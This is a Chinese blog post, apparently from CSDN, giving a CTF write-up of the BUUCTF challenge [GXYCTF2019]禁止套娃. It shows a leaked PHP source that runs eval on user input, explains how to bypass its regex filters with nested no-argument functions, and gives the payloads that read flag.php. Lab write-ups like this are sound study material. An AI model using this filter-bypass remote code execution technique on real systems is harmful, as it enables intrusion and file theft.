buuctf-[GXYCTF2019]禁止套娃(小宇特详解)

最新推荐文章于 2024-05-28 14:55:00 发布
最新推荐文章于 2024-05-28 14:55:00 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: buuctf 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/122902128
版权

buuctf-[GXYCTF2019]禁止套娃(小宇特详解)

这里先看题

img

这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php

这里直接看源码吧

<?php
 2 include "flag.php";
 3 echo "flag在哪里呢?<br>";
 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的内容。
 5     if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {//过滤了常用的几个伪协议,不能以伪协议读取文件。
 6         if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
     //(?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。
 7             if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {//正则匹配掉了et/na/info等关键字,很多函数都用不了。
 8                 // echo $_GET['exp'];
 9                 @eval($_GET['exp']);
10             }
11             else{
12                 die("还差一点哦!");
13             }
14         }
15         else{
16             die("再好好想想!");
17         }
18     }
19     else{
20         die("还想读flag,臭弟弟!");
21     }
22 }
23 // highlight_file(__FILE__);
24 ?>

关键点在

if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']))

这里的?R的意思就是

引用当前表达式,后面再加?是递归调用

所以exp必须是a(b());这种类型才行

我们通过源码了解到了flag在flag.php里

只要想办法读取就可以

scandir()函数可以扫描当前目录下的文件

<?php
print_r(scandir('.'));
?>

构造scandir(’.’)就可以

这里使用了2个函数

localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是.
current() 返回数组中的当前单元, 默认取第一个值。

这里注意

current(localeconv())永远都是个点

第一步

?exp=print_r(scandir(current(localeconv())));

这里需要读到倒数第二个数组

这里也是用到了两个函数

next():函数将内部指针指向数组中的下一个元素,并输出

array_reverse():数组以相反的元素顺序返回数组

最后的payload

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

小宇特详解
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
俄罗斯套娃程序及设计
06-09
1.递归函数遍历可达路径。 2.在递归函数调用时记录路经(保存在向量path_now中),并记录当前的套娃总重(score_now)。 3.走过的没有套娃的路口,将其值修改为HPZD(即0XFFFFFFFF),表明该路口已走过。 4.当递归函数返回时恢复path_now和score_now,并将当前函数所标记的HPZD(如果有)去除,即把该路口的值由HPZD改为0。 5.当一条路径走到死胡同时,比较score_now和score_best(此前的最大重量)。 如果score_now比score_best大,说明当前路径是目前为止最好的。把当前的路径替代之前最好的路径(path_best=path_now),并替换相应的套娃总重(score_best=score_now)。
[GXYCTF2019]禁止套娃 无回显 RCE 过滤__FILE__ dirname等
m0_64180167的博客
10-05 377
扫除git通过githack获取index.php发现是命令执行 并且存在过滤我们之前使用的 print_r(dirname(__FILE__));在这里不可以使用。
[GXYCTF2019]禁止套娃--详解
金 帛的博客
06-12 2309
BUUCTF记录贴
BUUCTF [GXYCTF2019] 禁止套娃
nareku的博客
06-29 1305
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
[GXYCTF2019]禁止套娃
pakho_C的博客
02-26 5528
web第37题 [GXYCTF2019]禁止套娃 打开靶场 审计源代码无发现,使用dirmap进行目录扫描 发现.git目录,猜测存在.git源码泄露,参考: CTF-WEB:Git 源码泄露 git文件致源码泄露 使用githack工具下载到.git文件夹下的index.php文件 index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_m
BuuCTF [GXYCTF2019]禁止套娃详解(两种方法)
2301_76690905的博客
10-28 405
点入题目没有提示,常规抓包看源码扫目录,用dirsearch扫目录的时候扫出git第一眼看见第二个if语句,if(';R)?\)/', NULL, $_GET['exp']))可以看出这是典型的无参数rce,然后是后面的if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp']),这里限制了phpinfo(),getcwd()这些函数用不了。
HDFView-3.1.2-win10_64-vs16压缩套娃.zip
03-17
用于 HDF4、HDF5(HDF,Hierarchical Data Format)、.nc(NetCDF,network Common Data Form)等文件的打开预览。
2010 “中兴捧月”校园程序设计大赛---俄罗斯套娃源码
05-21
本人写的一个关于俄罗斯套娃的源程序,其目的是抛砖引玉,欢迎大家分享优质、高效的代码。 经过本人强力测试,可以处理重量为0的娃娃。其实这也是这个程序比较难的地方。娃娃的重量为0,就表示该路口没有套娃可以...
众星捧月-俄罗斯套娃游戏开发
06-19
将Cross.txt文本中的的所代表的套娃重量的矩阵数据读入到Boy类的的成员weight二维数组中。 第二步:定义了向上走、向下走、向左走、向右走四个方向函数:Up()、Down()、Left()、Right(),每个函数都有一个...
精品源码 / 炫酷特效 / 双层悬浮方形相册
12-16
1、这是两个正方形套娃组合式相册特效 2、当鼠标悬浮在正方形上的时候,两个正方形的间距会增大,会看到十二张照片 3、表白专用 4、收费只是想让你们知道资源得来不易
医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法.zip
11-12
医学-套娃状锰氧化合物纳米晶复合粒子及其制备方法.zip
[GXYCTF2019]禁止套娃1 不会编程的崽的博客
不会编程的崽的博客
02-05 1156
ctf 源码泄露 无参数rce
BUUCTF-[GXYCTF2019]禁止套娃
yuqie的博客
04-06 229
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3397
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
BUUCTF】[GXYCTF2019]禁止套娃
aoao331198的博客
04-13 822
dirsearch扫描目录发现存在git泄露 于是用GitHack 生成index.php <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]+\
[GXYCTF2019]禁止套娃-无参数rce详细分析(代码审计三)
qq_50589021的博客
06-02 281
[GXYCTF2019]禁止套娃 做这个题的时候是不知道禁止套娃是什么意思的,等完全理解((?R)?\)\)了这个正则匹配表达式以后就可以明白,所谓的套娃就是什么 考点: 无参数rce 信息泄露 利用dirsearch开延时,会扫出来.git相关的泄露,利用githack将源码down下来 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
最新发布
fxalll的博客
05-28 330
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值